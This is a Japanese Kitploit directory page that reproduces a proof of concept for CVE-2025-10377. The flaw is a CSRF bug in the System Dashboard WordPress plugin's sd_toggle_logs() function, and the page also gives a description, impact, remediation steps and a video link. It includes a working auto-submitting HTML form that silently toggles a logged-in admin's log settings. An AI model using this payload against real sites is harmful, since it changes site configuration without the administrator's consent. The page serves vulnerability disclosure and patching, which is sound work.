Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
ツール/GitHubGitHub/nagisayumaa/cve-2025-10377
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

リポジトリを見る
0年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-10377 の概念実証: プラグイン System Dashboard におけるクロスサイトリクエストフォージェリ (CSRF) (関数 sd_toggle_logs)

脆弱性タイプ: クロスサイトリクエストフォージェリ (CSRF)

影響を受ける関数: sd_toggle_logs()

CVSS v3.1: 4.3 (中)
ベクトル: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(注記: スコアは管理者権限を持つ被害者とユーザー操作を必要とする不正な状態変更を反映しています。)

脆弱性の説明:

関数 sd_toggle_logs() は、ページアクセスログ、エラーログ、メール配信ログの有効化/無効化などの機密操作を処理します。しかし、この関数は $_REQUEST['log_type'] パラメータと権限チェック (current_user_can( 'manage_options' )) のみに依存しており、CSRF 対策 (例: check_admin_referer() や nonce) を実装していません。

その結果、攻撃者はログイン済みの管理者を悪意のあるページに誘導し、細工されたリクエストを静かに送信させることで、サイトのログ設定を意図せず有効化/無効化させることができます。

影響:

  • サイトのログ機能 (ページアクセスログ、エラーログ、メール配信ログ) に対する不正な状態変更。

  • エラーログが有効になった場合、サイトはプラグインによって決定されたファイルパスにアプリケーションエラーを書き込み始める可能性があります (ログを介した運用情報漏えいの可能性が高まります) が、この問題の直接的な影響は状態自体の切り替えです。

POC

manage_options 権限を持つログイン済みユーザーが攻撃者のページを訪問すると、明示的な同意なしに対象のログ機能が切り替わります。

root@kitploit:~
 <body>
    <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
      <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
      <input type="hidden" name="log&#95;type" value="errors&#95;log" />
      <input type="hidden" name="fast&#95;ajax" value="true" />
      <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

修復策

  • WordPress の nonce (check_admin_referer() または wp_verify_nonce()) を実装してリクエストを検証する。

  • 機密操作を POST リクエストのみに制限する。

  • CSRF 対策として権限チェックのみに依存しない。

ビデオ POC

レポートに記載されたとおりに問題を再現できない場合は、明確な再現シナリオについて以下のビデオデモ (PoC) を参照してください:

https://youtu.be/WtWYIfEM4W0

ツールをダウンロード